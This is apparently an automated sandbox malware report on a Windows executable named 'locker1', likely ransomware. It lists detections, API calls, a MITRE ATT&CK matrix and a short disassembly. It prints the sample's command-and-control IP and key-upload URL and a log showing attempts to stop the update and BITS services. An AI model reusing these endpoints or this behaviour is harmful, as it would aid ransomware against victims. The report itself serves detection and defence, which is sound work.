Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PC4rbXSgl4.exe

Overview

General Information

Sample name:PC4rbXSgl4.exe
renamed because original name is a hash value
Original sample name:8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d.exe
Analysis ID:1539283
MD5:12b818950d749c378aabd81a0bac9742
SHA1:e014c9e5f712775e771c7f36d2a580d8d290c9ad
SHA256:8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d
Tags:exeuser-lasq88
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • PC4rbXSgl4.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\PC4rbXSgl4.exe" MD5: 12B818950D749C378AABD81A0BAC9742)
    • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PC4rbXSgl4.exeAvira: detected
Source: PC4rbXSgl4.exeReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B7A80 BCryptGenRandom,BCryptCloseAlgorithmProvider,free,SetLastError,_CxxThrowException,0_2_00007FF6F18B7A80
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B78F0 BCryptGenRandom,SetLastError,_CxxThrowException,SetLastError,_CxxThrowException,0_2_00007FF6F18B78F0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B78A0 BCryptCloseAlgorithmProvider,0_2_00007FF6F18B78A0
Source: PC4rbXSgl4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdbUU source: PC4rbXSgl4.exe
Source: Binary string: C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdb source: PC4rbXSgl4.exe
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CD5D8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF6F18CD5D8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CD564 FindClose,abort,FindFirstFileExW,GetLastError,0_2_00007FF6F18CD564
Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.187
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18A5A50 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetOpenW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCrackUrlW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCloseHandle,InternetConnectW,HttpOpenRequestW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCloseHandle,HttpSendRequestW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,0_2_00007FF6F18A5A50
Source: global trafficHTTP traffic detected: GET /api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhHD HTTP/1.1Accept: text/*User-Agent: EncryptorHost: 77.91.77.187
Source: PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCAB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.187/
Source: PC4rbXSgl4.exeString found in binary or memory: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=
Source: PC4rbXSgl4.exeString found in binary or memory: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=Failed
Source: PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCA4C000.00000004.00000020.00020000.00000000.sdmp, ConDrv.0.drString found in binary or memory: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHh
Source: PC4rbXSgl4.exeString found in binary or memory: http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=
Source: PC4rbXSgl4.exeString found in binary or memory: http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=Failed
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18A5A500_2_00007FF6F18A5A50
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18C48C00_2_00007FF6F18C48C0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18A79300_2_00007FF6F18A7930
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18C92D00_2_00007FF6F18C92D0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CB2B80_2_00007FF6F18CB2B8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18C6A900_2_00007FF6F18C6A90
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18C42B00_2_00007FF6F18C42B0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CCAB00_2_00007FF6F18CCAB0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18AF2A00_2_00007FF6F18AF2A0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B6CFF0_2_00007FF6F18B6CFF
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CAC600_2_00007FF6F18CAC60
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18AFC000_2_00007FF6F18AFC00
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18A53500_2_00007FF6F18A5350
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18C53800_2_00007FF6F18C5380
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CAE760_2_00007FF6F18CAE76
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CD5D80_2_00007FF6F18CD5D8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B6E190_2_00007FF6F18B6E19
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18A35500_2_00007FF6F18A3550
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CB5380_2_00007FF6F18CB538
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CC5700_2_00007FF6F18CC570
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18C40D00_2_00007FF6F18C40D0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CA0A00_2_00007FF6F18CA0A0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B67F00_2_00007FF6F18B67F0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18B50300_2_00007FF6F18B5030
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18A5F400_2_00007FF6F18A5F40
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18AE7900_2_00007FF6F18AE790
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: String function: 00007FF6F18AB370 appears 34 times
Source: classification engineClassification label: mal56.winEXE@2/1@0/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: PC4rbXSgl4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PC4rbXSgl4.exeReversingLabs: Detection: 45%
Source: unknownProcess created: C:\Users\user\Desktop\PC4rbXSgl4.exe "C:\Users\user\Desktop\PC4rbXSgl4.exe"
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: PC4rbXSgl4.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PC4rbXSgl4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: PC4rbXSgl4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 7C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdbUU source: PC4rbXSgl4.exe
Source: Binary string: C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdb source: PC4rbXSgl4.exe
Source: PC4rbXSgl4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PC4rbXSgl4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PC4rbXSgl4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PC4rbXSgl4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PC4rbXSgl4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeAPI coverage: 6.1 %
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CD5D8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF6F18CD5D8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CD564 FindClose,abort,FindFirstFileExW,GetLastError,0_2_00007FF6F18CD564
Source: PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCA4C000.00000004.00000020.00020000.00000000.sdmp, PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCAC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CEAC8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F18CEAC8
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CE0C0 SetUnhandledExceptionFilter,_set_new_mode,0_2_00007FF6F18CE0C0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CEAC8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F18CEAC8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CEC6C SetUnhandledExceptionFilter,0_2_00007FF6F18CEC6C
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CDC10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6F18CDC10
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF6F18CD1AC
Source: C:\Users\user\Desktop\PC4rbXSgl4.exeCode function: 0_2_00007FF6F18CE9C4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6F18CE9C4
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Process Injection
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PC4rbXSgl4.exe46%ReversingLabsWin64.Trojan.Generic
PC4rbXSgl4.exe100%AviraTR/AVI.Agent.zvnls
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=PC4rbXSgl4.exefalse
    unknown
    http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=PC4rbXSgl4.exefalse
      unknown
      http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=FailedPC4rbXSgl4.exefalse
        unknown
        http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhPC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCA4C000.00000004.00000020.00020000.00000000.sdmp, ConDrv.0.drfalse
          unknown
          http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=FailedPC4rbXSgl4.exefalse
            unknown
            http://77.91.77.187/PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCAB5000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              77.91.77.187
              unknownRussian Federation
              42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1539283
              Start date and time:2024-10-22 14:44:04 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 2m 1s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:2
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:PC4rbXSgl4.exe
              renamed because original name is a hash value
              Original Sample Name:8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d.exe
              Detection:MAL
              Classification:mal56.winEXE@2/1@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 14
              • Number of non-executed functions: 102
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: PC4rbXSgl4.exe
              No simulations
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfile.exeGet hashmaliciousPhorpiexBrowse
              • 77.91.77.92
              i52xoegJro.exeGet hashmaliciousAmadeyBrowse
              • 77.91.77.82
              Jl5yg1Km2s.exeGet hashmaliciousAmadeyBrowse
              • 77.91.77.82
              file.exeGet hashmaliciousVidarBrowse
              • 77.91.101.71
              IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
              • 77.91.101.71
              file.exeGet hashmaliciousVidarBrowse
              • 77.91.101.71
              Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
              • 77.91.101.71
              Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
              • 77.91.101.71
              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
              • 77.91.77.82
              Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
              • 77.91.77.82
              No context
              No context
              Process:C:\Users\user\Desktop\PC4rbXSgl4.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):319
              Entropy (8bit):5.222748414513361
              Encrypted:false
              SSDEEP:6:/KqdXKo+KL0qdNsQXeow6ROosE4gHlLCs69Y9Wfok3JTGUqbDf+Vs://ao+KZ+QXeoZR2lMlLCsGY9WhTGxeVs
              MD5:9E7B531B776DC68770D5BAFFF1CF0222
              SHA1:CBE0066AB258599F041F196EA531A63A27130B99
              SHA-256:F3FAC3E83050494A7F4F77FE880F762CAB715F01DC76B9192C05D6C47CD4F315
              SHA-512:99B200AAD9467CA1A95DF9B56E49ECA91E8B147A5C8205C3C3EBB2FADFCB32449FC2962D9AECBF0602FEA0F337193A45DDEC5E72C18026E145761B06ABCB46A5
              Malicious:false
              Reputation:low
              Preview:ControlService failed for wuauserv with error: 1062..ControlService failed for BITS with error: 1062..Making GET request to: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhHD..HttpSendRequest failed with error: 12152..Failed to retrieve encryption key from PHP app..
              File type:PE32+ executable (console) x86-64, for MS Windows
              Entropy (8bit):6.292529485447728
              TrID:
              • Win64 Executable Console (202006/5) 92.65%
              • Win64 Executable (generic) (12005/4) 5.51%
              • Generic Win/DOS Executable (2004/3) 0.92%
              • DOS Executable Generic (2002/1) 0.92%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:PC4rbXSgl4.exe
              File size:300'544 bytes
              MD5:12b818950d749c378aabd81a0bac9742
              SHA1:e014c9e5f712775e771c7f36d2a580d8d290c9ad
              SHA256:8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d
              SHA512:77d6abeee1e8bcff6d69cba0c1c1f4d22db65acdd66540abe7d2f928c9e97f56c4f2333601aab07b0e399a6a02654a81b376ebcf816221e4ba139d4d25afb7c9
              SSDEEP:6144:6PC+IjUePMPCYtXJyVvWYgeWYg955/155/U0gwnMxNqH6VrmN:cC3UBdtXJyVvWYgeWYg955/155/Un
              TLSH:DB544A17E7A92CE8F9ABE07C89578549E7B2BC644712C7CF1390670E2E636D09D3E640
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Qz*.0.y.0.y.0.y.H.y.0.y...x.0.y...x.0.y...x.0.y...x.0.y...x.0.y...x.0.y.H.x.0.y.0.y.1.y...x.0.y...y.0.y...x.0.yRich.0.y.......
              Icon Hash:90cececece8e8eb0
              Entrypoint:0x14002e258
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x140000000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x6685AAAA [Wed Jul 3 19:46:50 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:903a7bfdd677cb763994ef73de28e499
              Instruction
              dec eax
              sub esp, 28h
              call 00007FC2F9094818h
              dec eax
              add esp, 28h
              jmp 00007FC2F9093F27h
              int3
              int3
              dec eax
              sub esp, 28h
              dec ebp
              mov eax, dword ptr [ecx+38h]
              dec eax
              mov ecx, edx
              dec ecx
              mov edx, ecx
              call 00007FC2F90940C2h
              mov eax, 00000001h
              dec eax
              add esp, 28h
              ret
              int3
              int3
              int3
              inc eax
              push ebx
              inc ebp
              mov ebx, dword ptr [eax]
              dec eax
              mov ebx, edx
              inc ecx
              and ebx, FFFFFFF8h
              dec esp
              mov ecx, ecx
              inc ecx
              test byte ptr [eax], 00000004h
              dec esp
              mov edx, ecx
              je 00007FC2F90940C5h
              inc ecx
              mov eax, dword ptr [eax+08h]
              dec ebp
              arpl word ptr [eax+04h], dx
              neg eax
              dec esp
              add edx, ecx
              dec eax
              arpl ax, cx
              dec esp
              and edx, ecx
              dec ecx
              arpl bx, ax
              dec edx
              mov edx, dword ptr [eax+edx]
              dec eax
              mov eax, dword ptr [ebx+10h]
              mov ecx, dword ptr [eax+08h]
              dec eax
              mov eax, dword ptr [ebx+08h]
              test byte ptr [ecx+eax+03h], 0000000Fh
              je 00007FC2F90940BDh
              movzx eax, byte ptr [ecx+eax+03h]
              and eax, FFFFFFF0h
              dec esp
              add ecx, eax
              dec esp
              xor ecx, edx
              dec ecx
              mov ecx, ecx
              pop ebx
              jmp 00007FC2F90939BEh
              int3
              dec eax
              mov eax, esp
              dec eax
              mov dword ptr [eax+08h], ebx
              dec eax
              mov dword ptr [eax+10h], ebp
              dec eax
              mov dword ptr [eax+18h], esi
              dec eax
              mov dword ptr [eax+20h], edi
              inc ecx
              push esi
              dec eax
              sub esp, 20h
              dec ecx
              mov ebx, dword ptr [ecx+38h]
              dec eax
              mov esi, edx
              dec ebp
              mov esi, eax
              dec eax
              mov ebp, ecx
              dec ecx
              mov edx, ecx
              dec eax
              mov ecx, esi
              dec ecx
              mov edi, ecx
              dec esp
              lea eax, dword ptr [ebx+04h]
              call 00007FC2F9094021h
              Programming Language:
              • [IMP] VS2008 SP1 build 30729
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x4250c0x154.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x1e0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4a0000x2604.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000xc28.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x383300x70.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x384000x28.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x381f00x140.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x310000x638.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
